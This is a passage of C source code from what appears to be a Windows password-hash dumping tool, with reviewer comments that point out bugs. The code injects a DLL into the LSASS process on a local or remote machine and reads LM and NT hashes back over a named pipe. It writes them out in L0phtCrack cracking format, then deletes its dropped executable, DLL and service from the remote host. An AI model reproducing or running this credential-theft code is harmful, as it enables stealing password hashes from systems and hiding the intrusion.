ConnParams param;
param.ip = target;
param.pipe = varg[0];
param.func = ProcessDumpOut;
HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, ¶m, 0, NULL);
if( hThread == INVALID_HANDLE )
{
fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
throw "";
}
fprintf( stderr, "connect to %s for result, plz wait...\n", param.ip );
// when the executable is finished running, it can be deleted - clean up
for( int i = 0; i < 30; i++ )
{
Sleep( 100 );
if( DeleteFile( rExename ) )
{
bDelExe = false;
break;
}
}
WaitForSingleObject( hThread, INFINITE );
throw " All Completed.\n";
}
// clean up
catch( char* msg )
{
if( msg && msg[0] ) fprintf( stderr, msg );
}
if( outfile ) fclose( outfile );
if( bDelExe && !DeleteFile(rExename) )
fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rExename, GetLastError() );
if( bDelDll && !DeleteFile(rDllname) )
fprintf( stderr, "couldn't delete %s from remote machine, error: %d\n", rDllname, GetLastError() );
if( bDelSvc)
{
DeleteService( hsvc );
CloseServiceHandle( hsvc );
}
if( hscm ) CloseServiceHandle( hscm );
if( !bLocal) WNetCancelConnection2( resourceName, 0, false );
if( shareInfor ) NetApiBufferFree( shareInfor );
return 0;
}
/*
 Run the dump against the local machine.
 pipename [in]: name of the status pipe; the receiver thread connects to it on
   "." and PrepareInject() is handed the same name.
 Returns 0 on every path. A failed thread creation is reported on stderr; a
 NULL from PrepareInject() returns silently.
 NOTE(review): hThread is never passed to CloseHandle(), and on the early
 return after PrepareInject() fails the receiver thread is left running and
 never joined.
*/
int LocalDump( char *pipename )
{
    HANDLE hLsassProc;
    // create pipe for status info: the receiver thread connects to pipename on
    // the local machine (".") and passes each received record to ProcessDumpOut()
    ConnParams param;
    param.ip = ".";
    param.pipe = pipename;
    param.func = ProcessDumpOut;
    // param lives on this stack frame; the thread is joined below before return,
    // except on the early-return paths noted above
    HANDLE hThread = (HANDLE)_beginthreadex( NULL, 0, thConnectPipe, &param, 0, NULL);
    // NOTE(review): _beginthreadex() returns 0 on failure; confirm INVALID_HANDLE
    // compares equal to that, otherwise this branch never fires.
    if( hThread == INVALID_HANDLE )
    {
        fprintf( stderr, "couldn't create receive thread, error: %d\n", GetLastError() );
        return 0;
    }
    hLsassProc = PrepareInject( pipename, RUN_LOCALLY );
    if( !hLsassProc ) return 0;
    // Inject the dll
    InjectDll( hLsassProc, magic );
    CloseHandle( hLsassProc );
    // server-side pipe handle, defined in another translation unit
    extern HANDLE hPipe;
    EndBindPipe( hPipe );//we must end the server pipe, so the program can end.
    // block until the receiver thread has drained the pipe and exited
    WaitForSingleObject( hThread, INFINITE );
    return 0;
}
/*
 Receiver-thread callback for one record read from the status pipe.
 buff [in/out]: the received bytes. Modified in place: a NUL is stored at
   buff[len] (so the caller's buffer must hold at least len + 1 bytes — TODO
   confirm against thConnectPipe), the second ':' is overwritten with NUL, and
   the payload after it is decoded in place.
 len [in]: number of valid bytes in buff.
 Records starting with SRV_OUTPUT_TAG or LSA_OUTPUT_TAG, or lacking two ':'
 separators, are not hash lines and are echoed to stderr unchanged; any other
 record is written to outfile as "<text before 2nd ':'>:<LM hex>:<NT hex>:::".
*/
void ProcessDumpOut( char *buff, int len )
{
    // terminate the received bytes so the string functions below can scan them
    buff[ len ] = 0;
    try
    {
        // status/progress lines carry a 4-byte tag; they are not hash records
        if( 0 == memcmp( buff, SRV_OUTPUT_TAG, 4 ) || 0 == memcmp( buff, LSA_OUTPUT_TAG, 4 ) )
            throw 1;
        // the hash payload starts after the second ':' (presumably "name:rid:payload")
        char *pHash = strchr( buff, ':' );
        if( !pHash ) throw 1;
        pHash = strchr( pHash+1, ':' );
        if( !pHash ) throw 1;
        *pHash = 0;   // buff now ends just before the second ':'
        pHash ++;
        char LMdata[40], NTdata[40], *p;
        int i;
        // obfuscation is reversible - this will make it plain text
        // (8 unsigned words = 32 bytes decoded in place; pHash is a char* into
        // the buffer, so the unsigned* cast may be misaligned — TODO confirm)
        obfuscate( (unsigned*)pHash, magic, 8 );
        BYTE* bdata = (BYTE*)pHash;
        // get LM hash: decoded bytes 16..31 rendered as 32 uppercase hex digits
        // NOTE(review): pHash is a char*, so pHash[4] is a single byte and can
        // never equal a 32-bit constant; this "no password" test (and the NT one
        // below) is unreachable as written — it looks like it was meant to index
        // the payload as unsigned words rather than bytes.
        if( (pHash[4] == 0x35b4d3aa) && (pHash[5] == 0xee0414b5)
            && (pHash[6] == 0x35b4d3aa) && (pHash[7] == 0xee0414b5) )
            sprintf( LMdata, "***********NO PASSWORD**********" );
        else for( i = 16, p = LMdata; i < 32; i++, p += 2 )
            sprintf( p, "%02X", bdata[i] );
        // get NT hash: decoded bytes 0..15 rendered as 32 uppercase hex digits
        if( (pHash[0] == 0xe0cfd631) && (pHash[1] == 0x31e96ad1)
            && (pHash[2] == 0xd7593cb7) && (pHash[3] == 0xc089c0e0) )
            sprintf( NTdata, "***********NO PASSWORD**********" );
        else for( i = 0, p = NTdata; i < 16; i++, p += 2 )
            sprintf( p, "%02X", bdata[i] );
        // display data in L0phtCrack-compatible format
        fprintf( outfile, "%s:%s:%s:::\n", buff, LMdata, NTdata );
    }
    catch( int dump )
    {
        // only ever thrown with 1, so non-hash records are always echoed
        if(dump)fprintf( stderr, "%s", buff );
    }
}
/* fnExist [in] : the full path of the file to copy.
pathNew [in] : the destination directory (path only, without a filename).
newFileName [out] : buffer that receives the full path of the new file; must be at least MAX_PATH long.
bool CopyFileTo( char *fnExist, char *pathNew, char newFileName[] )
{
char localPath[MAX_PATH];
GetFullPathName( fnExist, sizeof(localPath), localPath, &fnExist );
_snprintf( newFileName, MAX_PATH, "%s\\%s", pathNew, fnExist );
return CopyFile( localPath, newFileName, false );
}
*/
// Locale names handed to setlocale() by Unicode2Ansi() when the current locale
// cannot encode a character. They are tried in array order; the list is
// NULL-terminated so callers can walk it without a count.
char *locales[] = {
    "chinese", "cht", "chs",
    "danish", "czech", "belgian", "dutch",
    "australian", "canadian", "english", "english-nz", "uk", "american",
    "finnish",
    "french-belgian", "french-canadian", "french", "french-swiss",
    "german-austrian", "german", "swiss",
    "greek", "hun", "icelandic",
    "italian", "italian-swiss",
    "jpn", "korean",
    "norwegian-bokmal", "norwegian", "norwegian-nynorsk",
    "polish",
    "portuguese-brazilian", "portuguese",
    "rus", "slovak",
    "spanish", "spanish-mexican", "spanish-modern",
    "swedish", "turkish",
    NULL
};
/*
When a Unicode string contains characters outside the ANSI range (Chinese, Korean, ...),
conversion functions such as wcstombs and WideCharToMultiByte fail unless the locale
is set correctly. The conversion works once the locale is right, but the remote
machine's locale is unknown, so each Unicode character that fails to convert is retried
under every known locale, one by one.
I could not test Unicode2Ansi() and Ansi2Unicode() more thoroughly; I only have a Chinese Windows.
*/
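/*
 Convert a wide string to a multibyte string, retrying under each entry of
 locales[] whenever wctomb() rejects a character in the current locale.
 strDest [out]: receives the converted bytes plus a terminating NUL. No length
   is passed in, so the caller must size it for the worst case (wctomb() may
   emit up to MB_CUR_MAX bytes per character).
 wcsSrc [in]: NUL-terminated wide string to convert.
 Returns the number of bytes written including the terminator, or -1 when a
 character could not be encoded under any known locale; strDest is then
 NUL-terminated at the point of failure.
 Fixes versus the earlier version: the destination advances by the byte count
 wctomb() actually produced instead of a fixed two bytes, the last entry of
 locales[] is tried as well, and a conversion failure really returns -1.
*/
int Unicode2Ansi( char *strDest, wchar_t *wcsSrc )
{
    char *dest = strDest;
    int page = -1, oldpage = -1;
    int failed = 0;
    for( wchar_t *source = wcsSrc; *source != 0; source++ )
    {
        // values below 255 are stored as a single byte without conversion
        if( *source < 255 )
        {
            *dest++ = (char)*source;
            continue;
        }
        // first try the locale currently in effect; on failure walk the
        // candidate list, switching the process locale until one accepts it
        int temp = wctomb( dest, *source );
        page = -1;
        while( temp < 0 && locales[page + 1] )
        {
            page++;
            setlocale( LC_ALL, locales[page] );
            temp = wctomb( dest, *source );
        }
        if( temp < 0 )
        {
            failed = 1;   // no known locale can encode this character
            break;
        }
        // advance by the number of bytes wctomb() actually wrote
        dest += temp;
        // remember the locale that last had to be switched to, for the report below
        if( page != -1 ) oldpage = page;
    }
    *dest++ = 0;
    if( oldpage != -1 ) printf( "Remote Code Page is: %s.\n", locales[oldpage] );
    if( failed ) return -1;
    return (int)( dest - strDest );
}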
/*
 Convert a NUL-terminated multibyte string to a wide string.
 wcsDest [out]: receives the converted wide characters.
 strSrc [in]: NUL-terminated input string (length is discovered via -1).
 strCount [in]: passed on as strCount * 2 for the destination capacity.
   NOTE(review): MultiByteToWideChar() takes that capacity in wide characters,
   not bytes; if strCount is already the wchar_t capacity of wcsDest, doubling
   it overstates the buffer — confirm the caller's units.
 Returns MultiByteToWideChar()'s result: the number of wide characters written
 (including the terminator), or 0 on failure.
 Code page 0 is CP_ACP, the ANSI code page of the machine running this code,
 which is presumably why it handles both chs and jpn text on the author's system
 without an explicit code page.
*/
int Ansi2Unicode( wchar_t *wcsDest, char *strSrc, int strCount )
{
    const unsigned codePage = 0;
    const unsigned long flags = MB_PRECOMPOSED | MB_ERR_INVALID_CHARS;
    const int wideCapacity = strCount * 2;
    // An earlier experiment that looped over a fixed list of code pages and
    // printed which ones accepted the input was replaced by this single call.
    int written = MultiByteToWideChar( codePage, flags, strSrc, -1, wcsDest, wideCapacity );
    return written;
}